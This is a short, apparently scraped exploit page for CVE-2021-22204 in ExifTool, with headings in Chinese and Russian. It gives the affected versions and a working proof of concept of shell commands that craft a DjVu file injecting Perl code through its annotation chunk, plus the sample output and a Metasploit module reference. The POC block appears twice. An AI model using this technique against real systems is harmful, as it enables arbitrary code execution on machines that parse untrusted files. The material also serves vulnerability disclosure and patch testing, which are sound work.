# CVE-2021-22204 ExifTool任意代碼執行漏洞/zh-hant
==Затронутая версия==
ExifTool 7.44 to 12.23
==POC==
$ printf 'P1 1 1 0' > moo.pbm $ cjb2 moo.pbm moo.djvu $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu $ exiftool moo.djvu > /dev/null _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || -- Jakub Wilk
==Metasploit==
https://github.com/rapid7/metasploit-framework/pull/15185
exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
==影響版本==
ExifTool 7.44 to 12.23
==POC==
$ printf 'P1 1 1 0' > moo.pbm $ cjb2 moo.pbm moo.djvu $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu $ exiftool moo.djvu > /dev/null _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || -- Jakub Wilk
==Metasploit==
https://github.com/rapid7/metasploit-framework/pull/15185
exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容